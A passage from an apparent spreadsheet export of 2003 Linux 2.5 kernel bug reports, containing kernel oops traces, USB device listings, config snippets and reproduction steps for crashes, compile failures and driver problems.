[hid_probe+51/459] hid_probe+0x13/0x1cb May 12 12:55:11 death kernel: [usb_hotplug+561/592] usb_hotplug+0x231/0x250 May 12 12:55:11 death kernel: [usb_device_probe+119/160] usb_device_probe+0x77/0xa0 May 12 12:55:11 death kernel: [bus_match+69/128] bus_match+0x45/0x80 May 12 12:55:11 death kernel: [device_attach+79/144] device_attach+0x4f/0x90 May 12 12:55:11 death kernel: [bus_add_device+101/176] bus_add_device+0x65/0xb0 May 12 12:55:11 death kernel: [device_add+210/256] device_add+0xd2/0x100 May 12 12:55:11 death kernel: [usb_new_device+993/1328] usb_new_device+0x3e1/0x530 May 12 12:55:11 death kernel: [usb_hub_port_connect_change+449/816] usb_hub_port_connect_change+0x1c1/0x330 May 12 12:55:11 death kernel: [usb_hub_events+908/1072] usb_hub_events+0x38c/0x430 May 12 12:55:11 death kernel: [usb_hub_thread+53/240] usb_hub_thread+0x35/0xf0 May 12 12:55:11 death kernel: [default_wake_function+0/32] default_wake_function+0x0/0x20 May 12 12:55:11 death kernel: [usb_hub_thread+0/240] usb_hub_thread+0x0/0xf0 May 12 12:55:11 death kernel: [kernel_thread_helper+5/24] kernel_thread_helper+0x5/0x18 May 12 12:55:11 death kernel: May 12 12:55:11 death kernel: slab error in cache_free_debugcheck(): cache `size-2048': double free, or memory after ob ject was overwritten May 12 12:55:11 death kernel: Call Trace: May 12 12:55:11 death kernel: [kfree+307/848] kfree+0x133/0x350 May 12 12:55:11 death kernel: [hid_free_device+100/112] hid_free_device+0x64/0x70 May 12 12:55:11 death kernel: [hid_free_device+100/112] hid_free_device+0x64/0x70 May 12 12:55:11 death kernel: [hid_parse_report+406/480] hid_parse_report+0x196/0x1e0 May 12 12:55:11 death kernel: [usb_hid_configure+387/1872] usb_hid_configure+0x163/0x750 May 12 12:55:11 death kernel: [hid_probe+51/459] hid_probe+0x13/0x1cb May 12 12:55:11 death kernel: [usb_hotplug+561/592] usb_hotplug+0x231/0x250 May 12 12:55:11 death kernel: [usb_device_probe+119/160] usb_device_probe+0x77/0xa0 May 12 12:55:11 death kernel: [bus_match+69/128] bus_match+0x45/0x80 May 12 12:55:11 death kernel: [device_attach+79/144] device_attach+0x4f/0x90 May 12 12:55:11 death kernel: [bus_add_device+101/176] bus_add_device+0x65/0xb0 May 12 12:55:11 death kernel: [device_add+210/256] device_add+0xd2/0x100 May 12 12:55:11 death kernel: [usb_new_device+993/1328] usb_new_device+0x3e1/0x530 May 12 12:55:12 death kernel: [usb_hub_port_connect_change+449/816] usb_hub_port_connect_change+0x1c1/0x330 May 12 12:55:12 death kernel: [usb_hub_events+908/1072] usb_hub_events+0x38c/0x430 May 12 12:55:12 death kernel: [usb_hub_thread+53/240] usb_hub_thread+0x35/0xf0 May 12 12:55:12 death kernel: [default_wake_function+0/32] default_wake_function+0x0/0x20 May 12 12:55:12 death kernel: [usb_hub_thread+0/240] usb_hub_thread+0x0/0xf0 May 12 12:55:12 death kernel: [kernel_thread_helper+5/24] kernel_thread_helper+0x5/0x18 May 12 12:55:12 death kernel: May 12 12:55:12 death kernel: hub 1-0:0: debounce: port 2: delay 100ms stable 4 status 0x101 here's the full output of /proc/bus/usb/devices (you'll note that despite claiming itself as a HID device, the UPS doesn't have a driver in use) T: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=12 MxCh= 4 B: Alloc= 0/900 us ( 0%), #Int= 2, #Iso= 0 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=0000 ProdID=0000 Rev= 2.05 S: Manufacturer=Linux 2.5.69 ohci-hcd S: Product=Advanced Micro Devic AMD-766 [ViperPlus] S: SerialNumber=00:07.4 C:* #Ifs= 1 Cfg#= 1 Atr=40 MxPwr= 0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 2 Ivl=255ms T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 2 Spd=1.5 MxCh= 0 D: Ver= 1.10 Cls=00(&gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=051d ProdID=0002 Rev= 0.06 S: Manufacturer=American Power Conversion S: Product=Smart-UPS 1500 FW:601.3.D USB FW:1.3 S: SerialNumber=AS0218230520 C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 30mA I: If#= 0 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=00 Prot=00 Driver=(none) E: Ad=81(I) Atr=03(Int.) MxPS= 6 Ivl=100ms T: Bus=01 Lev=01 Prnt=01 Port=01 Cnt=02 Dev#= 3 Spd=12 MxCh= 4 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=0451 ProdID=2046 Rev= 1.25 C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 1 Ivl=255ms T: Bus=01 Lev=02 Prnt=03 Port=00 Cnt=01 Dev#= 6 Spd=12 MxCh= 0 D: Ver= 1.10 Cls=00(&gt;ifc ) Sub=00 Prot=00 MxPS=64 #Cfgs= 1 P: Vendor=0781 ProdID=0002 Rev= 0.09 S: Manufacturer=SanDisk Corporation S: Product=ImageMate CompactFlash USB S: SerialNumber=000000000006 C:* #Ifs= 1 Cfg#= 1 Atr=40 MxPwr=100mA I: If#= 0 Alt= 0 #EPs= 2 Cls=08(stor.) Sub=06 Prot=50 Driver=usb-storage E: Ad=82(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=02(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms T: Bus=01 Lev=02 Prnt=03 Port=01 Cnt=02 Dev#= 4 Spd=12 MxCh= 4 D: Ver= 1.10 Cls=09(hub ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=03eb ProdID=3301 Rev= 3.00 S: Product=Standard USB Hub C:* #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr= 64mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 1 Ivl=255ms T: Bus=01 Lev=03 Prnt=04 Port=01 Cnt=01 Dev#= 5 Spd=12 MxCh= 0 D: Ver= 1.10 Cls=00(&gt;ifc ) Sub=00 Prot=00 MxPS=16 #Cfgs= 1 P: Vendor=04e8 ProdID=300c Rev= 1.00 S: Manufacturer=Samsung Electronics Co., Ltd. S: Product=Samsung Laser Printer ML-1200 Series C:* #Ifs= 1 Cfg#= 1 Atr=c0 MxPwr= 0mA I: If#= 0 Alt= 0 #EPs= 2 Cls=07(print) Sub=01 Prot=02 Driver=usblp E: Ad=03(O) Atr=02(Bulk) MxPS= 64 Ivl=0ms E: Ad=81(I) Atr=02(Bulk) MxPS= 64 Ivl=0ms Steps to reproduce: plug in the UPS USB cable. Happens on boot if plugged in or after boot when plugging it in. I tried the patch suggestion on linux-usb-devel but that made it so it wasn't possible to finish booting. Boots cleanly with the cable unplugged</t>
  </si>
  <si>
    <t>panic at scsi_io_completion+0x171/0x480 (NULL pointer deref)</t>
  </si>
  <si>
    <t>2003-05-13 21:21 UTC</t>
  </si>
  <si>
    <t>Mike Wescott</t>
  </si>
  <si>
    <t>2005-07-05 12:02 UTC</t>
  </si>
  <si>
    <t>Distribution:RH-7.3 Hardware Environment: 4x P-200 (smp) 2 scsi bus aic7880: Ultra Wide cdrom is MATSHITA Model: CD-ROM CR-504 Rev: ST20 Software Environment: Problem Description: panic at panic at scsi_io_completion+0x171/0x480 (NULL pointer deref) with smp kernel and with smp kernel running nosmp problem does not occur with 2.4.18 Steps to reproduce: run dd if=/dev/cdrom of=/dev/null bs=2k and while that's active eject /dev/cdrom console output: # eject /dev/cdrom Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c0208181 *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;c0208181&gt;] Not tainted EFLAGS: 00010203 EIP is at scsi_io_completion+0x171/0x480 eax: 00000012 ebx: db71be20 ecx: 00000004 edx: dfcf1300 esi: db71bee0 edi: 00000000 ebp: db71be20 esp: c036be90 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c036a000 task=c02ff0e0) Stack: 00000005 00000000 dfcf1300 dfd59c00 00000000 08000002 dfdb3e00 dfd2c038 00000007 00000005 dfd20020 00000005 00000000 0003ac41 00000001 dfe1445f dffa7260 00000082 dfd2c038 dfdb3e00 dfd2c038 c022480e db71be20 db71be20 Call Trace: [&lt;c022480e&gt;] ahc_done+0x43e/0x490 [&lt;c022e4dd&gt;] rw_intr+0x10d/0x120 [&lt;c0203203&gt;] scsi_finish_command+0xd3/0xe0 [&lt;c0202fe9&gt;] scsi_softirq+0xf9/0x210 [&lt;c011fc7b&gt;] do_softirq+0x6b/0xd0 [&lt;c010b116&gt;] do_IRQ+0xf6/0x110 [&lt;c0106ee0&gt;] default_idle+0x0/0x40 [&lt;c0106ee0&gt;] default_idle+0x0/0x40 [&lt;c01098d0&gt;] common_interrupt+0x18/0x20 [&lt;c0106ee0&gt;] default_idle+0x0/0x40 [&lt;c0106ee0&gt;] default_idle+0x0/0x40 [&lt;c0106f0d&gt;] default_idle+0x2d/0x40 [&lt;c0106fb2&gt;] cpu_idle+0x52/0x70 [&lt;c0105000&gt;] _stext+0x0/0x50 [&lt;c036c7f6&gt;] start_kernel+0x146/0x150 Code: f3 a5 a8 02 74 02 66 a5 a8 01 74 01 a4 89 42 7c eb 12 8b 7c &lt;0&gt;Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing</t>
  </si>
  <si>
    <t>Laptop keyboard doesn't work</t>
  </si>
  <si>
    <t>2.5.69 and 2.5.69-bk8</t>
  </si>
  <si>
    <t>2003-05-14 06:49 UTC</t>
  </si>
  <si>
    <t>Felix K</t>
  </si>
  <si>
    <t>2003-10-22 04:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian (Sarge) Hardware Environment: Laptop, AMD mobile Athlon XP 2000+ VIA Technologies, Inc. P/KN266 Host Bridge No external keyboard connected (the thing doesn't even have a PS/2 connector). Please let me know if there is any more useful information I can supply. Software Environment: Problem Description: I can boot the kernel, but I can't input anything on the keyboard. I'm pretty sure that this is not due to a bad configuration. I read the post-halloween-2.5 doc and some related bug reports. Here are the relevant parts from my .config: CONFIG_INPUT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y I enabled DEBUG in i8042.c. I'll add the output (with 2.5.69-bk8) from kern.log as an attachment. Steps to reproduce: Boot the system ;-)</t>
  </si>
  <si>
    <t>The tc tool doesn't work</t>
  </si>
  <si>
    <t>2003-05-14 15:08 UTC</t>
  </si>
  <si>
    <t>2005-02-17 13:22 UTC</t>
  </si>
  <si>
    <t>Thomas Graf</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Penitum4 Software Environment: Linux version 2.5.69 Problem Description: When trying to add a qdisc, a class or a filter using the tc command I get an error. Example: "tc qdisc" RTNETLINK answers: Invalid argument Dump termineted. I don't have that problem with 2.5.68 kernel version. Steps to reproduce: Type "tc qdisc" in the shell.</t>
  </si>
  <si>
    <t>Between 2.5.68bk4 and bk5 usb stopped getting interrupt with acpi</t>
  </si>
  <si>
    <t>2.5.68-bk5</t>
  </si>
  <si>
    <t>2003-05-15 15:55 UTC</t>
  </si>
  <si>
    <t>Stian Jordet</t>
  </si>
  <si>
    <t>2004-03-03 21:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Asus CUV266-DLS Dual P3 Software Environment: Problem Description: With 2.5.68bk5 usb don't get any interrupts anymore. This has been working flawlessly untill bk5. When I diff dmesg from the two kernels, I get this: +IOAPIC[0]: Set PCI routing entry (2-11 -&gt; 0x81 -&gt; IRQ 11) +00:00:11[A] -&gt; 2-11 -&gt; IRQ 11 +IOAPIC[0]: Set PCI routing entry (2-10 -&gt; 0x79 -&gt; IRQ 10) +00:00:11[B] -&gt; 2-10 -&gt; IRQ 10 +IOAPIC[0]: Set PCI routing entry (2-5 -&gt; 0x51 -&gt; IRQ 5) +00:00:11[C] -&gt; 2-5 -&gt; IRQ 5 +IOAPIC[0]: Set PCI routing entry (2-9 -&gt; 0x71 -&gt; IRQ 9) +00:00:11[D] -&gt; 2-9 -&gt; IRQ 9 This is there only with bk5, not bk4. Don't know if this as anything to do with it. Part of /proc/interrupts With bk5 9: 0 0 IO-APIC-level acpi, uhci-hcd, uhci-hcd, uhci-hcd with bk4: 9: 268 1 IO-APIC-level acpi, uhci-hcd, uhci-hcd, uhci-hcd Thanks you.</t>
  </si>
  <si>
    <t>Battery info/status query called twice through /proc interface</t>
  </si>
  <si>
    <t>2.4.21-rc/acpi 2002-04-24</t>
  </si>
  <si>
    <t>2003-05-16 02:04 UTC</t>
  </si>
  <si>
    <t>Markus Gaugusch</t>
  </si>
  <si>
    <t>2004-03-03 21:34 UTC</t>
  </si>
  <si>
    <t>Problem Description: The acpi code is executed twice when doing 'cat /proc/acpi/BAT1/info' (same with 'state'). I added debug printk's to the appropriate functions to find this out.</t>
  </si>
  <si>
    <t>Consistent crash on kernel startup</t>
  </si>
  <si>
    <t>2.5.69-bk12</t>
  </si>
  <si>
    <t>2003-05-17 21:43 UTC</t>
  </si>
  <si>
    <t>Matthew Hughes</t>
  </si>
  <si>
    <t>Distribution: red hat 8.0 Hardware Environment:Athlon XP1900 Software Environment:gcc 3.2 Problem Description:oops on kernel startup - soon after lilo prompt Steps to reproduce: try to boot 2.5.69-bk12 (.config that worked well with 2.5.67) I couldn't scroll back through the oops - hope this is enough info. This crashed 3 times in a row, so I should be able to reproduce easily if I can add info. I copied the oops by hand off the console, so I may have missed something or mis-copied something - ask if something looks odd ... Oops looked like: esi: 0x01 edi: 0xc15cf540 ebp: 0xdff7fee4 esp: 0xdff7fed0 ds: 0x007b es: 0x007b ss: 0x0068 Process swapper(pid:1) Call Trace: agp_uio_probe+0x180 sysfs_create_dir+0x7e pci_device_probe+0x58 bus_match+0x43 driver_attach+0x5d bus_add_driver+0x9b driver_register+0x31 pci_register_driver agp_via_init+0x15 code: 8b 10 85 d2 74 2f b8 00 e0 ff ff 21 e0 ff 40 14 83 3a 02 0f If I can provide any more info, feel free to let me know ... this one seems easy to reproduce. If this is a duplicate, apologies ...</t>
  </si>
  <si>
    <t>rivafb problem</t>
  </si>
  <si>
    <t>2003-05-18 07:29 UTC</t>
  </si>
  <si>
    <t>2005-08-15 17:39 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: Toshiba satellite pro 6100 Software Environment: Problem Description: I power-on the laptop, see a lilo prompt, select the kernel image and from that moment on, my screen is messed up (picture1). I just have to wait a few minutes for X to start op and I'm able to work in X as usual. If I switch from X to console then garbage shows up again (picture 2). This is what I see: picture1: http://213.51.14.124/~stortplaats/IMG_2731.JPG picture2: http://213.51.14.124/~stortplaats/IMG_2728.JPG debbie:/home/kvdb# uname -a Linux debbie 2.5.69 #7 ma mei 5 12:19:30 CEST 2003 i686 unknown unknown GNU/Linux /var/log/messages: May 1 10:16:25 debbie kernel: rivafb: nVidia device/chipset 10DE0175 May 1 10:16:25 debbie kernel: rivafb: On a laptop. Assuming Digital Flat PanelMay 1 10:16:25 debbie kernel: rivafb: Detected CRTC controller 1 being used May 1 10:16:25 debbie kernel: rivafb: RIVA MTRR set to ON May 1 10:16:25 debbie kernel: rivafb: PCI nVidia NV20 framebuffer ver 0.9.5b (nVidiaGeForce4-4, 16MB @ 0xEC000000)</t>
  </si>
  <si>
    <t>Alpha kernel sound/core compile fails</t>
  </si>
  <si>
    <t>2003-05-18 13:00 UTC</t>
  </si>
  <si>
    <t>2004-07-17 18:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 RC1 Hardware Environment: Alpha UP1000 Software Environment: Linux Problem Description: Kernel comfile fails in sound/core/memalloc.c with the following messages: sound/core/memalloc.c: In function `mark_pages': sound/core/memalloc.c:408: `mem_map' undeclared (first use in this function) sound/core/memalloc.c:408: (Each undeclared identifier is reported only once sound/core/memalloc.c:408: for each function it appears in.) sound/core/memalloc.c:409: invalid use of undefined type `struct page' sound/core/memalloc.c:411: warning: implicit declaration of function `SetPageReserved' sound/core/memalloc.c:411: increment of pointer to unknown structure sound/core/memalloc.c:411: arithmetic on pointer to an incomplete type sound/core/memalloc.c: In function `unmark_pages': sound/core/memalloc.c:417: `mem_map' undeclared (first use in this function) sound/core/memalloc.c:418: invalid use of undefined type `struct page' sound/core/memalloc.c:420: warning: implicit declaration of function `ClearPageReserved' sound/core/memalloc.c:420: increment of pointer to unknown structure sound/core/memalloc.c:420: arithmetic on pointer to an incomplete type make[2]: *** [sound/core/memalloc.o] Error 1 make[1]: *** [sound/core] Error 2 make: *** [sound] Error 2 Steps to reproduce: It happens when I try and compile with sound included in the kernel or as a module. When I disable sound in my kernel config the compile works fine.</t>
  </si>
  <si>
    <t>hyperthreading not enabled on Intel Xeon duial processors</t>
  </si>
  <si>
    <t>2003-05-21 07:28 UTC</t>
  </si>
  <si>
    <t>James D Freels</t>
  </si>
  <si>
    <t>2004-12-02 07:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/Sid Hardware Environment: dual-processor Xeon 2.4 Ghz, Intel MB Software Environment: procps, top, and /proc/stat Problem Description: There does not appear to be a hyperthread switch in the menuconfig anymore. However, the following is enabled in the .config file: CONFIG_X86_HT=y In the 2.4.20 kernel, the output from the "top" application within the procps package of Debian indicates 4 processors showing that hyperthreading is enabled for the dual-processor system. However, for the 2.5.69 kernel, only two processors show up and hyperthreading is apparently not enabled. This can be confirmed by examining the contents of /proc/stat with the two kernels booted: Output from grep '^cpu' /proc/stat for kernel 2.4.20 cpu 7385 0 2052 130123 cpu0 2442 0 648 31800 cpu1 1440 0 210 33240 cpu2 1762 0 943 32185 cpu3 1741 0 251 32898 Output from grep '^cpu' /proc/stat for kernel 2.5.69 cpu 4199 0 1582 23671 5887 cpu0 1894 0 1045 11249 3494 cpu1 2305 0 536 12422 2392 Steps to reproduce:</t>
  </si>
  <si>
    <t>compiler version requirements mismatch/uncertainty for sparc</t>
  </si>
  <si>
    <t>2003-05-22 09:20 UTC</t>
  </si>
  <si>
    <t>2003-11-26 17:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Sun Blade 100 Software Environment: Kernel/egcs Problem Description: In Documentation/Changes you can find: "gcc 2.91.66 (egcs-1.1.2) continues to be supported for SPARC64 requirements." So this suggests a special treatment for Sparc. Issuing sparc64-linux-gcc -v i get Reading specs from /usr/lib/gcc-lib/sparc64-unknown-linux-gnu/egcs-2.92.11/specs gcc version egcs-2.92.11 19980921 (gcc2 ss-980609 experimental) So i guess i should be allright or Documentation is old. make image bails out with: init/main.c:65: #error Sorry, your GCC is too old. It builds incorrect kernels. In init/main.c i find:#if __GNUC__ &lt; 2 || (__GNUC__ == 2 &amp;&amp; __GNUC_MINOR__ &lt; 95) #error Sorry, your GCC is too old. It builds incorrect kernels. #endif So prolly no special treatment for Sparc. One out of two would then be wrong. Steps to reproduce: try to compile kernel for sparc with egcs 2.92.11</t>
  </si>
  <si>
    <t>Null pointer dereference in ext3_test_allocatable</t>
  </si>
  <si>
    <t>2.5.69-mm8</t>
  </si>
  <si>
    <t>2003-05-22 11:56 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:48 UTC</t>
  </si>
  <si>
    <t>Distribution: RH7.3 Hardware Environment: 8-way PIII-700, 16 GB ram Software Environment: anticipatory scheduler, ext3, preempt enabled Problem Description: While I was trying to reproduce bug 738, I got this but I believe it is sufficiently different enough to call it a new bug. Apologies in advance if I'm wrong on that. I was also able to produce this one earlier today when I was compiling LTP but was unsuccessful upon trying it again. I didn't have the serial console setup during the LTP compile when I produced this bug the first time so I missed the output that time, but I recognize the Null pointer and the EIP from before. Unable to handle kernel NULL pointer dereference at virtual address 00000010 printing eip: c0197db3 *pde = 35b80001 Oops: 0000 [#1] CPU: 3 EIP: 0060:[&lt;c0197db3&gt;] Not tainted VLI EFLAGS: 00010206 EIP is at ext3_test_allocatable+0x23/0x40 eax: 00000000 ebx: f6a9e000 ecx: 00002c76 edx: f6628688 esi: 00002c76 edi: 00002c60 ebp: 00000000 esp: f6b11a2c ds: 007b es: 007b ss: 0068 Process ftest07 (pid: 1354, threadinfo=f6b10000 task=f63a3920) Stack: c0197f9f 00002c76 f6628688 00000000 00001000 f6a9e000 00008000 ffffffff f7c6351c f6628688 c01980d6 ffffffff f6628688 00008000 00000000 c0160744 f7c5c6dc 001c0000 00001000 00000037 00000038 f7c6351c f6b11ac8 c019848d Call Trace: [&lt;c0197f9f&gt;] find_next_usable_block+0x1cf/0x2c0 [&lt;c01980d6&gt;] ext3_try_to_allocate+0x46/0x190 [&lt;c0160744&gt;] __bread+0x14/0x30 [&lt;c019848d&gt;] ext3_new_block+0x26d/0x610 [&lt;c011cbb6&gt;] __wake_up+0x66/0xb0 [&lt;c019a9cd&gt;] ext3_alloc_block+0x1d/0x30 [&lt;c019ad45&gt;] ext3_alloc_branch+0x45/0x280 [&lt;c01605fa&gt;] bh_lru_install+0xca/0xf0 [&lt;c019b31f&gt;] ext3_get_block_handle+0x20f/0x2f0 [&lt;c0162b43&gt;] alloc_buffer_head+0x13/0x60 [&lt;c015ff87&gt;] create_buffers+0x57/0xb0 [&lt;c019b460&gt;] ext3_get_block+0x60/0x70 [&lt;c0161070&gt;] __block_prepare_write+0x140/0x3e0 [&lt;c010829c&gt;] __up_wakeup+0x8/0xc [&lt;c0161bf0&gt;] block_prepare_write+0x20/0x40 [&lt;c019b400&gt;] ext3_get_block+0x0/0x70 [&lt;c019b882&gt;] ext3_prepare_write+0x42/0xe0 [&lt;c019b400&gt;] ext3_get_block+0x0/0x70 [&lt;c013e12e&gt;] generic_file_aio_write_nolock+0x66e/0xac0 [&lt;c013bb9a&gt;] unlock_page+0xa/0x50 [&lt;c013c994&gt;] file_read_actor+0x64/0xd0 [&lt;c013c9a1&gt;] file_read_actor+0x71/0xd0 [&lt;c013c535&gt;] do_generic_mapping_read+0xf5/0x4f0 [&lt;c0179a2d&gt;] update_atime+0x6d/0xc0 [&lt;c013cbb5&gt;] __generic_file_aio_read+0x1b5/0x1e0 [&lt;c013e619&gt;] generic_file_write_nolock+0x99/0xc0 [&lt;c0160dc4&gt;] __block_write_full_page+0x284/0x3f0 [&lt;c011f7c0&gt;] autoremove_wake_function+0x0/0x40 [&lt;c011f7c0&gt;] autoremove_wake_function+0x0/0x40 [&lt;c0182174&gt;] mpage_writepages+0x234/0x3d0 [&lt;c01657c0&gt;] blkdev_writepage+0x0/0x20 [&lt;c0142b89&gt;] check_poison_obj+0x39/0x190 [&lt;c0144a5a&gt;] kmalloc+0xfa/0x1c0 [&lt;c013e850&gt;] generic_file_writev+0x40/0x60 [&lt;c015dc30&gt;] do_readv_writev+0x1c0/0x270 [&lt;c015d6d0&gt;] do_sync_write+0x0/0xe0 [&lt;c015d07d&gt;] generic_file_llseek+0x2d/0xd0 [&lt;c015d050&gt;] generic_file_llseek+0x0/0xd0 [&lt;c015dd77&gt;] vfs_writev+0x47/0x50 [&lt;c015ddff&gt;] sys_writev+0x2f/0x50 [&lt;c01094df&gt;] syscall_call+0x7/0xb Code: 00 8d bc 27 00 00 00 00 8b 54 24 08 8b 4c 24 04 8b 42 18 0f a3 08 19 c0 85 c0 74 03 31 c0 c3 8b 02 a9 00 04 00 00 74 0a 8b 42 24 &lt;8b&gt; 40 10 85 c0 75 06 b8 01 00 00 00 c3 0f a3 08 19 d2 31 c0 85 Steps to reproduce: from a current CVS of LTP (today is 5/22/2003): run ftest07 in one session while waiting for that to complete (it takes a while) I ran these: aio01 -n100000 aio01 -c10 -n10000 Both completed successfully but when ftest07 finished it had the output above.</t>
  </si>
  <si>
    <t>Ben Winslow</t>
  </si>
  <si>
    <t>Changing the CPU frequency using CPUFREQ hangs the kernel</t>
  </si>
  <si>
    <t>2.5.70</t>
  </si>
  <si>
    <t>2003-05-27 07:31 UTC</t>
  </si>
  <si>
    <t>2003-07-12 14:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Hardware Environment: Compaq EVO N1015v - AMD Athlon 1800+, 512 MB RAM, IDE HDD/DVD etc.. Software Environment: 2.5.70, Gnc C 3.2.2, Linux C Library 2.3.2 Problem Description: Changing the CPU frequency hangs the kernel (except this one time under X it just rebooted it :( ) Steps to reproduce: Consider the following two shell scripts 1. powersave.sh #!/bin/bash echo 532000 &gt; /sys/class/cpu/cpu0/cpufreq/scaling_max_freq echo powersave &gt; /sys/class/cpu/cpu0/cpufreq/scaling_governor 2. performance.sh #!/bin/bash echo 1529500 &gt; /sys/class/cpu/cpu0/cpufreq/scaling_max_freq echo performance &gt; /sys/class/cpu/cpu0/cpufreq/scaling_governor No problem while executing powersave.sh, but the kernel hangs after executing performance.sh. No sysrq response. AFAIK cpufreq on this same machine worked fine during 2.5.68 (although the sysfs cpufreq files were in a different directory location back then). Here is the /var/log/messages information relating to the Athlon 1800+: May 28 19:57:57 laptop kernel: powernow: AMD K7 CPU detected. May 28 19:57:57 laptop kernel: powernow: PowerNOW! Technology present. Can scale : frequency and voltage. May 28 19:57:57 laptop kernel: powernow: Found PSB header at c00f0800 May 28 19:57:57 laptop kernel: powernow: Table version: 0x12 May 28 19:57:57 laptop kernel: powernow: Flags: 0x0 (Mobile voltage regulator) May 28 19:57:57 laptop kernel: powernow: Settling Time: 100 microseconds. May 28 19:57:57 laptop kernel: powernow: Has 31 PST tables. (Only dumping ones r elevant to this CPU). May 28 19:57:57 laptop kernel: powernow: PST:24 (@c00f099e) May 28 19:57:57 laptop kernel: powernow: cpuid: 0x780^Ifsb: 133^ImaxFID: 0x1^Is tartvid: 0x9 May 28 19:57:57 laptop kernel: powernow: FID: 0x12 (4.0x [532MHz])^IVID: 0x13 (1.200V) May 28 19:57:57 laptop kernel: powernow: FID: 0x4 (5.0x [665MHz])^IVID: 0x13 (1.200V) May 28 19:57:57 laptop kernel: powernow: FID: 0x6 (6.0x [798MHz])^IVID: 0x13 (1.200V) May 28 19:57:57 laptop kernel: powernow: FID: 0xc (9.0x [1197MHz])^IVID: 0xd (1.350V) May 28 19:57:57 laptop kernel: powernow: FID: 0x1 (11.5x [1529MHz])^IVID: 0x9 (1.550V) May 28 19:57:57 laptop kernel: May 28 19:57:57 laptop kernel: powernow: Minimum speed 532 MHz. Maximum speed 15 29 MHz. My relavant .config section for CPUFREQ: CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_GOV_USERSPACE=y CONFIG_CPU_FREQ_TABLE=y CONFIG_X86_ACPI_CPUFREQ=y CONFIG_X86_POWERNOW_K7=y The 'lspci' output from the computer: 00:00.0 Host bridge: ATI Technologies Inc: Unknown device cab0 (rev 13) 00:01.0 PCI bridge: ATI Technologies Inc U1/A3 AGP Bridge [IGP 320M] (rev 01) 00:02.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:07.0 ISA bridge: ALi Corporation M1533 PCI to ISA Bridge [Aladdin IV] 00:08.0 Multimedia audio controller: ALi Corporation M5451 PCI AC-Link Controller Audio Device (rev 02) 00:0a.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 02) 00:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 20) 00:0c.0 Communication controller: Conexant HSF 56k HSFi Modem (rev 01) 00:0f.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 00:10.0 IDE interface: ALi Corporation M5229 IDE (rev c4) 00:11.0 Bridge: ALi Corporation M7101 PMU 01:05.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility U1 Thanks Hari harisri@bigpond.com</t>
  </si>
  <si>
    <t>i810: Unknown symbol mmu_cr4_features</t>
  </si>
  <si>
    <t>2003-05-27 08:45 UTC</t>
  </si>
  <si>
    <t>massimo</t>
  </si>
  <si>
    <t>2003-05-29 06:15 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 Hardware Environment: Dell Inspiron 2500 - PIII i815 Software Environment: Problem Description: Can't load module i810.ko. dmesg reports: i810: Unknown symbol mmu_cr4_features Steps to reproduce: modprobe i810</t>
  </si>
  <si>
    <t>i810 fb driver does not compile</t>
  </si>
  <si>
    <t>2003-05-27 08:47 UTC</t>
  </si>
  <si>
    <t>HJH</t>
  </si>
  <si>
    <t>2003-07-03 05:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: AMD Athlon 750, 192 Mb, 40Gb IBM hdd, Matrox G400 Software Environment: gcc 3.2 (as in Mandrake 9.1) Problem Description: The i810 framebuffer driver does not compile Steps to reproduce: make xconfig ; select the i810 framebuffer as module ; make modules... -&gt; error! (I</t>
  </si>
  <si>
    <t>hwclock + rtc + acpi -&gt; dead system</t>
  </si>
  <si>
    <t>2.5.70-bk1, beginning with 2.5.69-bk18</t>
  </si>
  <si>
    <t>2003-05-27 12:21 UTC</t>
  </si>
  <si>
    <t>Amir C. Akhavan</t>
  </si>
  <si>
    <t>2004-03-03 21:35 UTC</t>
  </si>
  <si>
